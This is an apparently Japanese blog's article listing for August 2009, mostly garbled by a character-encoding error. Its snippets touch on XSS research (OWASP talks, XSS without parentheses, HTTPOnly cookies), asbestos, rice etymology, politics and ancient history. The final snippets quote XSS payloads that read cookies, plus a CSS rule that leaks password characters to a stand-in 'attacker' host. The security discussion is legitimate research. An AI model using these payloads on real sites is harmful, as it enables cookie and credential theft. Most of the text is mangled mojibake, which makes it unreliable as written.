2009-08-01ãã1ã¶æéã®è¨äºä¸è¦§
ä¸è¨ã®ãããªååã®ãMario Heiderich æ°ã«ããã¹ã©ã¤ããããã¾ããCONFidence2009 OWASP2009 in Krakow ã«ãããè¬æ¼ã«ä½¿ã£ãã¹ã©ã¤ãã®ããã§ãããã®ã¹ã©ã¤ãã®47ãã¼ã¸ãã50ãã¼ã¸ã«ããã¦ãThe same domain inclusion problemãã¨ãããã¼ãã§ãmultiâ¦
ã¢ã¹ãã¹ããèºã®æªæ§è «çã®åå ã¨ãªããã¨ã¯ç¥ããã¦ããããã©ããã®çç±ãå¾æ¥ä¸æã§ãã£ããããã§ãããã¨ãããæè¿ããã£ã¡ãã£ããããâ¦ãã®åå ã¯é常ã®èºããã«ãé©ç¨ã§ããã¨ã®ãã¨ã§ããããã¿ãã³ãæªããããã¨ã®å ·ä½çãªä½ç¨ã¾ã§ããã£ã¡ãã£â¦
ã»ã»ã»ãªãã§ãã£ã¦ãã³ã£ããã ã¦ã«ãç±³ç¨ã®ç±³ã®åç£å°ã§ããã¤ã³ãã®å¤ä»£èªãµã³ã¹ã¯ãªããã§ãç±³ãã®ãã¨ããã¦ãªã(urihi)ãã¨è¨ããæ±åã¢ã¸ã¢ã®åè¨èªã§å容ããï¼çç¥ï¼ãããã«ã¯æ¥æ¬èªã«ãå¤æ¥èªã¨ãã¦å ¥ã£ã¦ãã¦ãã¦ã«ã(uruchi)ããèªçããã¨ã®â¦
THE ULTIMATE IDS SMACKDOWN::Gareth Heyes and Mario Heiderich for OWASP London,07.2009 ä¸è¨PDFã¯ã2009å¹´7æã®OWASP London大ä¼ã§ã®è³æã§ãã 21ãã¼ã¸ãããã«Yosuke Hasegawa script without a-z0-9ãç´¹ä»ããã¦ãã¾ããã ååã¨ã©ãã¦ãªãã(w ãâ¦
人éã¯ç¤¾ä¼ççç©ã§ã¯ãªã社ä¼åµé ççç©ã§ãããã¨ã天賦ã®äººæ¨©ãªã©ã¯ããããå¹»æ³ã§ãã£ã¦äººæ¨©ã¯ä¸æã®åªåã§äººéèªããåã¡åãç¶ããªãã¦ã¯ãããªããã®ã§ãããã¨ãå æ¥ã®æ¥è¨ã§æ¸ããã®ã§ãããããã¾ã§æ¸ãã¦æéåãã«ãªããæ¬å½ã«æ¸ãããã£ããã¨â¦
ä¸ã®ãµãã¤ã®ãã©ããã·ã«ã«ãªå½é¡ã¯ãã¨ãã«ã人éã®ä¸»ä½æ§ã®åé¡ã ã¨æãã¾ãã æ¸è°·æ¿æ²»å¦ã§å¦ãã å ·ä½çãªæå°±ã®æ段ã¯ã人éãé ãè¿ãããã®é·æçãªã³ãã¥ãã±ã¼ã·ã§ã³ã¨æè²ã§ãã 人éããããã«æ°ä¸»ä¸»ç¾©ç¤¾ä¼ãæ¯ãããã ãã®åå¨ã«æé·ãããããâ¦
æ¸è°·æ¿æ²»å¦ã§å¦ãã ããã²ã¨ã¤ã®å¤§ããªããã©ããã¯ã¹ãããã¾ããæ¸è°·å çæ°ããã天賦ã®äººæ¨©ããªãã¦ãããããªããã人権ã¯ç¶ç¶çã«åã¡åã£ã¦ãããã®ãã§ããã¨ãèªç±ãå¹³çã¯ç¥ãä¸ãããä¿éãã¦ããããã®ã§ã¯ãªããç§ãã¡äººéãé ãåºãåªåãæ±ãâ¦
人éã¯ç¤¾ä¼ççç©ã§ãããã¨è¨ããããã¨ãããã¾ããåä¾ã®é ãããã®è¨èã¯ç§ã«ã¨ã£ã¦é¦´æã¿ãããã¾ãããåé¨åå¼·ãçµã大å¦ã«å ¥ã£ã¦ã¾ããªã1å¹´çã®é ã«åè¬ããæ¸è°·å çã«ããæ¿æ²»å¦è¬ç¾©ã§ã人éã¯ç¤¾ä¼ççç©ã§ã¯ãªããã¨æãããå¼·ãå°è±¡ã«æ®ãã¾ããâ¦
ä¼é½å½ã¯æ±æ¸ããã¨ããå¦èª¬ãã¡ã¢ããã®ã§ããããã®å¾æ°ãã¤ãããã¨ããããããã«ã¡ã¢ããã¦ã¿ã¾ãã åå¼¥å¼ã®æ代ã«å¤§å½ã§ããéã¨å¤äº¤é¢ä¿ãæã£ãããã§ããããã£ããããããé訳è ã¯ã©ããªäººç©ãªãã§ãããããèç¶æ§ãé«ãä¸çªãµããããè ã¯ããâ¦
ã¨ãããããªãã¨ãããã¨ã¼ã¯è«¸åãã®ããã ã§è延ãã¦ããããããï¼æ¬å½ã ããé©ãã¡ã¾ãï¼ ãã£ããã¯ã©ãããç太åãè¨ãæ¾ã£ãããã¾ãã¾ãªè«¸å¢åããã®ç太åå¦ã¸ã®äººæ ¼æ»æã«ã¤ãã¦ã®æ´é²ã®ããã ãããã¨ã¼ã¯è«¸åãã¯ç室å é¨ã«ä¿è·ãã¹ãäººæ ¼ãªã©â¦
ããããã¼ãããã¼ ï¼±ï¼è人åä¾ã婦人ãªã©ããã£ã¨ããã¾ã«å½ãè½ã¨ãé½å¸çã¸ã®ç¡å·®å¥çæãä¸çå²ä¸ã§å¤§è¦æ¨¡ãªç¡å·®å¥çæãæåã«è¡ã£ãã¯ã«ã¼ã¤å½ã£ã¦ã©ã¼ãã ï¼ ï¼¡ï¼å¤§æ¥æ¬å¸å½ãä¸è¯æ°å½èä»ç³æ¿æ¨©ãæ¿æ¨©ä¸æ¢ãå京ããéæ ¶ã«ç§»ããå¾ãæããçè»ã®â¦
大ééãããã¦ããã®ã§ã
ãããã¾ãéªé¦¬å°å½ã¨é¢ä¿ã
å人ä¼ã®ä¼é½å½ã¯ç³¸å³¶å島ã§ããã¨ããã®ãå®èª¬ãªãã ããã©ãããªããåºã«ãã¡ãªããç¡è¶ãªæ³åãã²ã¨ã¤ãå½æã®å人ãå人èªã§ãããã®ãã¤ããããªãã¡æ¼¢åã§æ¸ãã°ãæ±æ´¥ããæèãã¦ããã¨ãããªãï¼å¤ä»£å°åãæ¤ç´¢ããã¨ããæ±æ´¥ããä½è³çã¯ææ海沿â¦
ã»ã»ã»ãç´ã£ã¦ãããURLã¢ãã¬ã¹ãå½è£ ã§ããã®ã§ãã£ãã®ã ããã©ããã¡ããã¨å ±åãã¦ããã¦è¯ãã£ããHTMLãã¼ã¸ã«åãè¾¼ã¾ããç»åã¨ããã©ãã·ã¥ã¨ããæ¾ãã«è¡ãã¨ãã«ãã®URLãã¢ãã¬ã¹ãã¼ã«è¡¨ç¤ºããã±ã¼ã¹ããã£ã¦ããã£ããã¨ã¢ãã¬ã¹ãã¼ãæ¬æ¥â¦
éã³ã«æ¥ã¦ããæå ¬çæ©é¢ã«åãã¤ãã®ãã©ã¦ã¶ã«ã¯ãããã·ãããã£ã¦ãã¦ã¾ãã¨ã«ä¸æè°ãªãã¨ã«bakera.jp/htmlbbsã®æ°ç鳩丸æ²ç¤ºæ¿ãè¦ããã¨ãã§ãã¾ããã£ãããããããªãã®ã§æ®å¿µãªæãããã¾ãããã©ããããããã·ã®ãã©ãã¯ãªã¹ãã«ç»é²ããã¦ããâ¦
T.Teradaããã«ããå®ä¾ãæè¦ã㦠2009-07-18ã®T.Teradaããã®æ¥è¨ã®ãæ¬å¼§ãªãã®XSSãã¨ããé¡åã®è¨äºãèå³æ·±ãèªã¾ãã¦é ãã¾ãããå®éã«å®ä¾ããã£ãã®ã§ããããããæ¯ã æ¬å¼§ãªãã®XSSã¨ããé¡æã«ã¤ãã¦ã¯ããã®å¾ãOur Favorite XSS Filters/IDS â¦
http://wizardbible.org/32/kanatoko.txthttp://www.tietew.jp/articles/2007/02/07/misunderstood-html-escapingã»ãããããã§ããã¨èªèãã ã»ãã¼ã¸ã®æåã³ã¼ããããªã«ããã§ããã¨èªèãã ã»ãããã®ãã¼ã»ã³ãã¨ã³ã³ã¼ããå¿ è¦ã§ããã¨èªèãã ã»â¦
èªå®¤ã®ãã½ã³ã³ã ããç¥ã£ã¦ããèªåã§ä½ã£ããµã¤ãã®HTTPOnlyãªCookieãIEã«ä¿åããã¦ãã¾ãããã§ããããã®ãµã¼ãã«ã¯ãcookieãåãåºããããªã¹ã¯ãªããã¯ã²ã¨ã¤ãããã¾ãããã¨ããããµã¼ããµã¤ãã§å¯ä¸è¦ªãã¿ã®ããPerlãããããåå¼·ãããã¨ãã¦â¦
ããã¨ã大å£ãããæ¸ããã¦ã§ãã¢ããªã®ã»ãã¥ãªãã£ã«ã¤ãã¦ã®å ¥éæ¬ã®130ãã¼ã¸ããããèªãã§ãã¾ãããããã«ã¾ã£ããç解ã§ããªãXSSã¢ã¿ãã¯ã®ãã¯ã¿ãæ¸ãã¦ãã£ã¦ããã®ç ´å£åã¯éæ¼ããªãã¦ã¯ãããªããããã§ããã£ã¦æãã¦ããã®ã¯ç§ã ãã§ãæ¢â¦
ç§ããã½ã³ã³ã«èå³ãæã£ã¦ä½¿ãå§ããã¨ãã«ã¯æ¢ã«ã³ã³ãã¥ã¼ã¿ã²ã¼ã ã¯å¸å ´ãå½¢æããã¦ãã¾ãããç§ã¯è¶£å³ãæªãã¦ãæµè¡ã®ã²ã¼ã ããããªã¼ã«ãã¹ã¿ã¤ã«ãªã²ã¼ã ããã好ãã§éãã ãã®ã§ããè¦è¦ã«ã¡ãã£ã¨å¼±ç¹ããããã¦ããã®ã§ããã¹ãä¸å¿ã®ã»ããâ¦
ã»ãã¥ãªãã£ã«èå³ãããçæ§ããã²ãèªã¿ãã ãããã³ã³ãã¥ã¼ã¿ãããã¯ã¼ã¯ä¸çãæç«ããåã®å¤ãæ代ããã®ãµã¤ããã£ãã«æ»æã®äºä¾ãªã©æ´å²ãå¦ã¹ã¦é常ã«é¢ç½ãã§ãã ææ°ã®ãã¯ããã¸ã¼ã§ã¯ã©ãã¾ã§å¯è½ãªã®ãã«ã¤ãã¦ãã ãã§ã«éè¦ã¤ã³ãã©ã«â¦
alert(document.cookie) alert(document['cookie']) with(document)alert(cookie)å°ã åãªãã°Firefoxã§ã¯ã ããã以ä¸ã®ãããªãã¨ãåºæ¥ãè¨æ¶ãããã¾ãã[,],.ã使ããªãã§ãããããªæãã§ãalert( eval('cookie',eval('document',window)) )evalã®ç¬¬äºâ¦
pure css-based XSS attacks ?<style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=âlogin.aspâ/> HTML5 includes "seamless" iframes could allow for pure css-based XSS attacks ãã®ãããªãã¯ã¿ããããè¿ãå°æ¥ã«ããã¦å®ç¾ãããªãã°æ¥µãã¦</iframe>â¦